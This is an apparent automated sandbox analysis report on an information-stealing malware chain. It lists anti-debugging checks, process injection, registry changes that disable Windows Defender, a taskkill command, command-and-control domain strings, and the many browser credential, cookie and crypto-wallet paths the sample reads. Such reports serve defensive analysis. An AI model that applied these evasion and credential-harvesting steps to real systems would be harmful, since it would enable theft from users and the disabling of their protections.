Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: SIWVID
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\1000350002\6a8d4317d4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Code function: 0_2_04CF0DC8 rdtsc 0_2_04CF0DC8
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B75BB0 LdrInitializeThunk, 7_2_00B75BB0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A8652B mov eax, dword ptr fs:[00000030h] 6_2_00A8652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A8A302 mov eax, dword ptr fs:[00000030h] 6_2_00A8A302
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process token adjusted: Debug
Source: C:\Users\user\1000350002\6a8d4317d4.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe PID: 3368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A570A0 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree, 6_2_00A570A0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Memory written: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe base: 400000 value starts with: 4D5A
Source: ea2c7beae0.exe String found in binary or memory: licendfilteo.site
Source: ea2c7beae0.exe String found in binary or memory: clearancek.site
Source: ea2c7beae0.exe String found in binary or memory: bathdoomgaz.stor
Source: ea2c7beae0.exe String found in binary or memory: spirittunek.stor
Source: ea2c7beae0.exe String found in binary or memory: dissapoiznw.stor
Source: ea2c7beae0.exe String found in binary or memory: studennotediw.stor
Source: ea2c7beae0.exe String found in binary or memory: mobbipenju.stor
Source: ea2c7beae0.exe String found in binary or memory: eaglepawnoy.stor
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp, 8X6R8OO7U6CNLMSAL.exe.11.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ea2c7beae0.exe, 00000007.00000002.2464157606.0000000000D61000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000D.00000002.2679450339.00000000005ED000.00000040.00000400.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2922419882.0000000000D61000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000006.00000002.2920009693.0000000000C3E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 8{{Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6D3E2 cpuid 6_2_00A6D3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000350002\6a8d4317d4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000401001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000350002\6a8d4317d4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00A6CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A565E0 LookupAccountNameA, 6_2_00A565E0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: ea2c7beae0.exe, 0000000B.00000003.2684413253.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684499484.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 1.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.h3yRbjNWk1.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: 8X6R8OO7U6CNLMSAL.exe PID: 4192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 15.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\ElectronCash\wallets
Source: ea2c7beae0.exe String found in binary or memory: Wallets/JAXX New Version
Source: ea2c7beae0.exe, 0000000B.00000003.2670087048.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ea2c7beae0.exe, 0000000B.00000003.2603721155.0000000000A97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
Source: ea2c7beae0.exe, 0000000B.00000003.2670087048.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: ea2c7beae0.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ea2c7beae0.exe String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
